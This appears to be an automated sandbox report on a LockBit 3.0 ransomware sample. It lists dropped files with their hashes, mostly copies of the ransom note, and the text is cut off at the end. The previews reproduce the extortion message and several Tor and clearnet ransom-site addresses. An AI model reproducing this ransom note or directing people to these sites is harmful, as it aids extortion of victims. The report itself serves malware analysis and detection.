                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.980626708829221
                Encrypted:false
                SSDEEP:192:+DmbxByEJjhz4r5PwJHlpEeNoi4wdctBUq3zvjyZNa2Yno:+arjR4tPwJFpEEnZYeZ8K
                MD5:EE5D4782E1B57823B1C27D3D1B066E6C
                SHA1:895516F2970A2548553E610E29D082769188140A
                SHA-256:FCC3D01CE463E63E539FFD13D1F8C510BC3304E2778C4FAEE10AB569F000499C
                SHA-512:A160A617FE57636065D3A0A467E03B3EC7EB37109837A191B11795CEE6636F7E506EA6D108DBF4D17A5B89C29FE69979D2D128DE57E0609DDE2AC4FA7E4DAC08
                Malicious:false
                Preview:.(..Yg.'{T!_.V.mM`<....`...ZB.-.|..yVUln.Z.KH.K6.W7>.....V......)Nv?t.5{:K;j'.c..a..j..#c..G..&..W..xg*.96..gl.f/....t^...D....B3+9C.>J.Jz'i3;..........N._..7....$&.0....{....hg.....^S.....@.f...4.2..t.......]...Y..#..eA.W.k....c3...u....(.+.....7......A..7E.........&.K...X..rq..C...[!.{l.G&26G.......u.CBX../..."..$rG.H$[}..gs7.{:IG..A. ....g...pd.UY.j...EJ...V...F.d....1.h8.&.....[.....t..(...1...p..{Tv.=.A.H.!F9......&g.5Q.G..^.Y......@.t..6E..87..a.9...l.y!0s.....~.....'.....VH.C.b...A...^5......b.K...i&-d.3C..p.....oU..S.......!.l.(6RW.1.....@g.....<@....-..s......."[..P.A..<.H<.&.h...mw...F.E.&....R......7..F..%p.A..t..C....1.5..r./w.;..\.y4.?.r.Pm...Q......D.'K....q.HG[5.3.u]..u..A..Vt@.ND/...0..@.......j.P...`..w.Zn..H..v|1..<....I....A.e...E~...ed7.6...\i..M.....&..{..+.L...L..&...}.V..O.C..g^X......<._..+[.$..s3..._..e......P.dH..q1..`b!v...7....4.....q/Q.,d.m...P.c.VY;.....1tRJ..L..W.+.j.p ..@...^...?'..F57>( 0*[..=y...

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal 